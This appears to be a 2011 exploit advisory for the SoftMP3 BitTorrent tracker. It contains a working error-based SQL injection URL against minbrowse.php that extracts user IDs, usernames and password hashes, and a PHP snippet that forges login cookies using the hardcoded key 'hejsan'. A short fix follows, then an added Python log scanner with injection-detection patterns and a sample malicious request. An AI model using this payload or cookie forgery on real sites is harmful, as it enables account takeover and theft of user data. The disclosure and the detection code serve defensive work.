Vendor: SoftMP3 source code
Author: mArTi
CVSS: 7.5 (HIGH)
CWE: CWE-89 (SQL Injection)
Product Name: SoftMP3 source code
Affected Version From: No other versions available...
Affected Version To: No other versions available...
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows / Unix
2011

SOFTMP3 source code SQL injection

SoftMP3 released the source code of its BitTorrent tracker when the site shut down. That source code is vulnerable to SQL injection: the PoC sends a crafted SQL fragment through the search parameter of minbrowse.php, which can be used to extract user records (id, username and password hash) from the database. The fix is to delete the minbrowse.php file and to change the cookie encryption in the bittorent.php file.

Mitigation:

Delete the minbrowse.php file and change the cookie encryption in the bittorent.php file.

Exploit-DB raw data:

# Exploit Title: SOFTMP3 source code SQL injection
# Date: 23/04/2011
# Author: mArTi
# Software Link: http://softmp3.org/
# Version: No other versions available...
# Tested on: Windows / Unix

/.................................../ Introduction /.................................../

SoftMP3 released the source code of its BitTorrent tracker when it died. This source code is vulnerable to SQL injection.
Here are the PoC and the fix.

/.................................../ PoC /.................................../

-> SQL http://localhost/SOFTMP3/minbrowse.php?search=string' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,users.id,0x27,users.username,0x27,users.passhash,0x27,0x7e) FROM `database`.users where id=1 LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"

-----> Then you can use this to connect as any user you want, with the passhash you got, by setting the following cookies:

uid=id
pass=encrypted passhash (see below)


---------> getting the encrypted passhash to connect with the cookies
<?php
// Cookie value as computed by bittorent.php: md5 of the client IP, the user's
// passhash, the fixed key "hejsan" and the client IP again.
// $HTTP_SERVER_VARS is the legacy name for $_SERVER.
$test=md5($HTTP_SERVER_VARS["REMOTE_ADDR"]."passhash"."hejsan".$HTTP_SERVER_VARS["REMOTE_ADDR"]);
echo "pass cookie is $test";
?>

/.................................../ FIX /.................................../

Delete /minbrowse.php (useless).

BTW, if you want to protect the cookies, just change the cookie encryption in the bittorent.php file (e.g. the "hejsan" key or the order of the terms in the encryption).

--------------------------------------------------------
Protect yourself against the security breaks in your security to protect your users and your site. If you want to contact me, you'll know where to find me.
--------------------------------------------------------
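As an added defensive example (not part of the advisory or of the SoftMP3 code), the Python below scans web-server access-log lines for the markers of the error-based injection used in the PoC above (the floor(rand(0)*2) GROUP BY trick against information_schema), so attempts against minbrowse.php can be spotted in logs while the file is being removed. The log lines, IP addresses and threshold are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory). Line 3
# has the shape of the PoC request against minbrowse.php; line 4 is a benign
# search that merely contains the words "group by".
SAMPLE_LOG = """\
10.0.0.5 - - [23/Apr/2011:10:01:02 +0000] "GET /SOFTMP3/minbrowse.php?search=metallica HTTP/1.1" 200 5120
10.0.0.6 - - [23/Apr/2011:10:01:09 +0000] "GET /SOFTMP3/browse.php?cat=3 HTTP/1.1" 200 8801
10.0.0.7 - - [23/Apr/2011:10:02:44 +0000] "GET /SOFTMP3/minbrowse.php?search=string%27%20and(select%201%20from(select%20count(*),concat((select%20passhash%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20%271%27=%271 HTTP/1.1" 200 1200
10.0.0.8 - - [23/Apr/2011:10:03:10 +0000] "GET /SOFTMP3/minbrowse.php?search=the+group+by+name HTTP/1.1" 200 4410
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Markers of the MySQL duplicate-key error-based technique used in the PoC:
# GROUP BY over floor(rand(0)*2) with count(*)/concat(), which makes the
# database echo the selected value inside its error message.
INDICATORS = {
    "information_schema": re.compile(r"information_schema", re.I),
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "count_concat": re.compile(r"count\s*\(\s*\*\s*\)\s*,\s*concat\s*\(", re.I),
    "quote_breakout": re.compile(r"'\s*(and|or)\b", re.I),
}

def analyse_request(target: str) -> dict:
    """Decode one request target's query string and report which indicators
    appear in any parameter value (parse_qs already URL-decodes)."""
    parts = urlsplit(target)
    hits = set()
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        for value in values:
            for name, pattern in INDICATORS.items():
                if pattern.search(value):
                    hits.add(name)
    return {"path": parts.path, "indicators": sorted(hits)}

def scan_log(text: str, min_indicators: int = 2) -> list:
    """Return one finding per log line that matches at least min_indicators
    markers; requiring two keeps an ordinary search for 'group by' quiet."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m:
            result = analyse_request(m.group("target"))
            if len(result["indicators"]) >= min_indicators:
                findings.append({"line": lineno, "ip": line.split(" ", 1)[0], **result})
    return findings
```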